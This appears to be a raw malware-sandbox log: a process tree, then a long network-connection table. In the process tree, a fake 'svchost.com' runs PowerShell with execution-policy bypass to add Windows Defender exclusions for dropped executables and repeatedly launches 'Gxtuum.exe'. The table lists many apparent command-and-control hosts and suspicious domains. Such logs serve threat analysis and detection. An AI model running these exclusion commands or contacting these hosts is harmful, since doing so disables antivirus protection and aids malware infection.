"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.130.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 ftp.ywxww.net udp
US 8.8.8.8:53 49.130.101.151.in-addr.arpa udp
CN 60.191.208.187:820 ftp.ywxww.net tcp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
HK 103.149.92.191:80 tcp
CN 101.133.156.69:7777 tcp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 137.184.144.245:4782 tcp
N/A 192.168.100.18:4782 tcp
RU 185.215.113.217:80 185.215.113.217 tcp
US 8.8.8.8:53 217.113.215.185.in-addr.arpa udp
IN 122.170.110.131:9105 122.170.110.131 tcp
US 8.8.8.8:53 131.110.170.122.in-addr.arpa udp
US 137.184.144.245:4782 tcp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 79.113.190.64.in-addr.arpa udp
US 64.190.113.79:443 tcp
RU 185.215.113.66:80 185.215.113.66 tcp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
RU 83.149.17.194:80 83.149.17.194 tcp
US 8.8.8.8:53 194.17.149.83.in-addr.arpa udp
CN 183.57.21.131:8095 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
RU 185.215.113.66:80 185.215.113.66 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
RU 185.215.113.66:80 185.215.113.66 tcp
DE 136.243.104.235:443 tcp
US 64.190.113.79:443 tcp
US 137.184.144.245:4782 tcp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
US 8.8.8.8:53 235.104.243.136.in-addr.arpa udp
US 8.8.8.8:53 www.ammyy.com udp
DE 136.243.18.118:80 www.ammyy.com tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 118.18.243.136.in-addr.arpa udp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.134.89:80 r11.o.lencr.org tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 89.134.221.88.in-addr.arpa udp
RU 185.215.113.66:80 185.215.113.66 tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.179.227:443 gstatic.com tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
RU 185.215.113.84:80 185.215.113.84 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 84.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 safe.ywxww.net udp
RU 185.215.113.17:80 185.215.113.17 tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
US 8.8.8.8:53 17.113.215.185.in-addr.arpa udp
US 64.190.113.79:443 tcp
RU 185.215.113.66:80 185.215.113.66 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 push-hook.cyou udp
US 104.21.10.6:443 push-hook.cyou tcp
US 8.8.8.8:53 processhol.sbs udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 librari-night.sbs udp
US 8.8.8.8:53 befall-sm0ker.sbs udp
US 8.8.8.8:53 6.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 p10tgrace.sbs udp
US 8.8.8.8:53 peepburry828.sbs udp
US 8.8.8.8:53 owner-vacat10n.sbs udp
US 8.8.8.8:53 3xp3cts1aim.sbs udp
US 8.8.8.8:53 p3ar11fter.sbs udp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
RU 185.215.113.66:80 185.215.113.66 tcp
US 8.8.8.8:53 85.99.22.2.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 marshal-zhukov.com udp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 8.8.8.8:53 80.160.67.172.in-addr.arpa udp
N/A 192.168.100.18:4782 tcp
US 137.184.144.245:4782 tcp
US 64.190.113.79:443 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 8.8.8.8:53 141.233.202.91.in-addr.arpa udp
US 64.190.113.79:443 tcp
RU 185.215.113.66:80 185.215.113.66 tcp
RU 185.215.113.36:80 185.215.113.36 tcp
US 8.8.8.8:53 thicktoys.sbs udp
US 8.8.8.8:53 fleez-inc.sbs udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 pull-trucker.sbs udp
US 8.8.8.8:53 3xc1aimbl0w.sbs udp
US 8.8.8.8:53 36.113.215.185.in-addr.arpa udp
FR 176.150.119.15:56001 tcp
US 8.8.8.8:53 bored-light.sbs udp
US 8.8.8.8:53 300snails.sbs udp
US 8.8.8.8:53 faintbl0w.sbs udp
US 8.8.8.8:53 crib-endanger.sbs udp
US 208.95.112.1:80 ip-api.com tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
TH 45.141.26.170:80 45.141.26.170 tcp
US 8.8.8.8:53 marshal-zhukov.com udp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.72.235.82:80 www.update.microsoft.com tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 170.26.141.45.in-addr.arpa udp
US 8.8.8.8:53 82.235.72.20.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
SY 5.134.254.142:40500 tcp
UZ 213.230.108.92:40500 udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 92.108.230.213.in-addr.arpa udp
SG 35.185.187.24:80 35.185.187.24 tcp
US 8.8.8.8:53 24.187.185.35.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 64.190.113.79:443 tcp
IR 188.215.221.55:40500 udp
US 8.8.8.8:53 55.221.215.188.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
MX 189.167.44.219:40500 udp
TH 45.141.26.170:7000 tcp
US 8.8.8.8:53 219.44.167.189.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 reinforcenh.shop udp
N/A 192.168.100.18:4782 tcp
US 137.184.144.245:4782 tcp
US 8.8.8.8:53 gutterydhowi.shop udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 ghostreedmnu.shop udp
US 8.8.8.8:53 offensivedzvju.shop udp
US 8.8.8.8:53 vozmeatillu.shop udp
IR 91.185.146.150:40500 udp
US 8.8.8.8:53 150.146.185.91.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 drawzhotdog.shop udp
US 8.8.8.8:53 twizthash.net udp
RU 185.215.113.66:5152 twizthash.net tcp
US 8.8.8.8:53 fragnantbui.shop udp
US 8.8.8.8:53 stogeneratmns.shop udp
US 8.8.8.8:53 reinforcenh.shop udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
FR 176.150.119.15:56001 tcp
MX 189.133.11.24:40500 udp
US 8.8.8.8:53 24.11.133.189.in-addr.arpa udp
US 8.8.8.8:53 300snails.sbs udp
US 8.8.8.8:53 thicktoys.sbs udp
US 8.8.8.8:53 fleez-inc.sbs udp
US 8.8.8.8:53 pull-trucker.sbs udp
US 8.8.8.8:53 3xc1aimbl0w.sbs udp
US 8.8.8.8:53 bored-light.sbs udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 faintbl0w.sbs udp
US 8.8.8.8:53 crib-endanger.sbs udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 64.190.113.79:443 tcp
UZ 213.206.44.35:40500 udp
US 8.8.8.8:53 35.44.206.213.in-addr.arpa udp
UZ 213.230.99.119:40500 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
DE 85.10.193.220:80 tcp
UZ 195.158.22.4:40500 udp
US 8.8.8.8:53 220.193.10.85.in-addr.arpa udp
US 8.8.8.8:53 4.22.158.195.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
UZ 213.230.97.138:40500 udp
US 8.8.8.8:53 138.97.230.213.in-addr.arpa udp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
US 137.184.144.245:4782 tcp
US 64.190.113.79:443 tcp
UZ 90.156.163.33:40500 udp
US 8.8.8.8:53 33.163.156.90.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
KZ 89.218.186.142:40500 udp
US 8.8.8.8:53 142.186.218.89.in-addr.arpa udp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
RU 93.123.145.179:40500 udp
US 8.8.8.8:53 179.145.123.93.in-addr.arpa udp
US 64.190.113.79:443 tcp
EG 62.114.143.56:40500 tcp
US 64.190.113.79:443 tcp
UZ 89.249.62.14:40500 udp
US 8.8.8.8:53 14.62.249.89.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
IR 2.179.117.33:40500 udp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 33.117.179.2.in-addr.arpa udp
US 137.184.144.245:4782 tcp
KZ 5.63.94.144:40500 udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 144.94.63.5.in-addr.arpa udp
UZ 90.156.164.28:40500 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
UZ 89.249.62.94:40500 udp
US 8.8.8.8:53 94.62.249.89.in-addr.arpa udp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 home.sevkk17vt.top udp
US 64.190.113.79:443 tcp
MX 189.136.17.247:40500 udp
US 8.8.8.8:53 247.17.136.189.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
UZ 89.236.218.158:40500 udp
US 8.8.8.8:53 158.218.236.89.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
RU 37.78.33.95:40500 udp
US 8.8.8.8:53 95.33.78.37.in-addr.arpa udp
US 137.184.144.245:4782 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
RU 185.215.113.206:80 185.215.113.206 tcp
KZ 178.91.28.42:40500 udp
US 8.8.8.8:53 206.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 42.28.91.178.in-addr.arpa udp
US 64.190.113.79:443 tcp
MX 201.138.180.213:40500 tcp
YE 46.35.84.77:40500 udp
US 8.8.8.8:53 property-imper.sbs udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 frogs-severz.sbs udp
US 8.8.8.8:53 occupy-blushi.sbs udp
US 8.8.8.8:53 blade-govern.sbs udp
US 104.21.80.208:443 blade-govern.sbs tcp
US 8.8.8.8:53 77.84.35.46.in-addr.arpa udp
US 8.8.8.8:53 208.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 story-tense-faz.sbs udp
US 104.21.1.25:443 story-tense-faz.sbs tcp
US 8.8.8.8:53 leg-sate-boat.sbs udp
US 8.8.8.8:53 disobey-curly.sbs udp
US 104.21.70.128:443 disobey-curly.sbs tcp
US 8.8.8.8:53 25.1.21.104.in-addr.arpa udp
US 8.8.8.8:53 motion-treesz.sbs udp
US 104.21.94.231:443 motion-treesz.sbs tcp
US 8.8.8.8:53 powerful-avoids.sbs udp
US 172.67.187.4:443 powerful-avoids.sbs tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 128.70.21.104.in-addr.arpa udp
US 8.8.8.8:53 231.94.21.104.in-addr.arpa udp
US 8.8.8.8:53 4.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
KZ 37.151.73.50:40500 udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 50.73.151.37.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
KZ 95.59.171.222:40500 udp
US 8.8.8.8:53 222.171.59.95.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
IR 2.185.189.167:40500 udp
US 137.184.144.245:4782 tcp
US 8.8.8.8:53 167.189.185.2.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 property-imper.sbs udp
US 8.8.8.8:53 frogs-severz.sbs udp
US 8.8.8.8:53 occupy-blushi.sbs udp
US 64.190.113.79:443 tcp
US 104.21.80.208:443 blade-govern.sbs tcp
UZ 90.156.161.82:40500 udp
US 104.21.1.25:443 story-tense-faz.sbs tcp
US 8.8.8.8:53 leg-sate-boat.sbs udp
US 104.21.70.128:443 disobey-curly.sbs tcp
US 8.8.8.8:53 82.161.156.90.in-addr.arpa udp
US 104.21.94.231:443 motion-treesz.sbs tcp
US 172.67.187.4:443 powerful-avoids.sbs tcp
US 64.190.113.79:443 tcp
GB 2.22.99.85:443 steamcommunity.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
IR 2.176.94.43:40500 tcp
US 64.190.113.79:443 tcp
KZ 89.218.244.178:40500 udp
US 8.8.8.8:53 178.244.218.89.in-addr.arpa udp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
EG 197.121.126.87:40500 udp
US 8.8.8.8:53 87.126.121.197.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
KZ 92.46.228.246:40500 udp
US 8.8.8.8:53 246.228.46.92.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
IR 185.71.153.146:40500 udp
US 137.184.144.245:4782 tcp
US 8.8.8.8:53 146.153.71.185.in-addr.arpa udp
US 64.190.113.79:443 tcp
PK 39.48.235.83:40500 udp
US 8.8.8.8:53 83.235.48.39.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
KZ 213.211.105.70:40500 udp
UZ 90.156.163.123:40500 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 70.105.211.213.in-addr.arpa udp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
KZ 89.218.186.86:40500 udp
US 8.8.8.8:53 86.186.218.89.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
UZ 90.156.162.106:40500 udp
US 8.8.8.8:53 106.162.156.90.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
MX 187.230.224.82:40500 udp
US 137.184.144.245:4782 tcp
US 8.8.8.8:53 82.224.230.187.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
YE 46.161.239.195:40500 udp
US 8.8.8.8:53 195.239.161.46.in-addr.arpa udp
IR 5.202.242.190:40500 tcp
IR 151.232.179.149:40500 udp
US 8.8.8.8:53 149.179.232.151.in-addr.arpa udp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
UZ 213.230.69.230:40500 udp
US 8.8.8.8:53 230.69.230.213.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 137.184.144.245:4782 tcp
SY 77.44.150.37:40500 udp
US 8.8.8.8:53 37.150.44.77.in-addr.arpa udp
NE 41.138.38.164:40500 udp
US 8.8.8.8:53 164.38.138.41.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
AM 109.68.122.14:40500 udp
US 8.8.8.8:53 14.122.68.109.in-addr.arpa udp
US 64.190.113.79:443 tcp
DE 159.100.18.229:40500 tcp
US 8.8.8.8:53 229.18.100.159.in-addr.arpa udp
US 64.190.113.79:443 tcp
UZ 89.236.216.14:40500 udp
US 8.8.8.8:53 14.216.236.89.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 209.80.50.20.in-addr.arpa udp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
BG 146.70.53.161:40500 udp
US 8.8.8.8:53 161.53.70.146.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
US 137.184.144.245:4782 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
RU 31.8.29.135:40500 tcp
YE 178.130.103.42:40500 udp
US 8.8.8.8:53 42.103.130.178.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
UZ 213.230.126.169:40500 udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 169.126.230.213.in-addr.arpa udp
US 64.190.113.79:443 tcp
CN 8.130.42.227:10001 tcp
US 64.190.113.79:443 tcp
KZ 2.133.45.6:40500 udp
US 8.8.8.8:53 6.45.133.2.in-addr.arpa udp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
UZ 93.188.86.253:40500 udp
US 8.8.8.8:53 253.86.188.93.in-addr.arpa udp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 137.184.144.245:4782 tcp
US 64.190.113.79:443 tcp
YE 134.35.100.89:40500 udp
US 8.8.8.8:53 89.100.35.134.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
SY 77.44.228.98:40500 tcp
EG 45.241.38.203:40500 udp
US 8.8.8.8:53 203.38.241.45.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 cdn.ly.9377.com udp
GB 79.133.176.200:80 cdn.ly.9377.com tcp
N/A 192.168.1.13:5555 tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 200.176.133.79.in-addr.arpa udp
CN 183.57.21.131:8095 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 client.9377.com udp
CN 120.79.30.240:80 client.9377.com tcp
US 64.190.113.79:443 tcp
RU 185.215.113.66:80 twizthash.net tcp
RU 185.215.113.66:80 twizthash.net tcp
US 64.190.113.79:443 tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
N/A 192.168.100.18:4782 tcp
US 64.190.113.79:443 tcp
US 137.184.144.245:4782 tcp
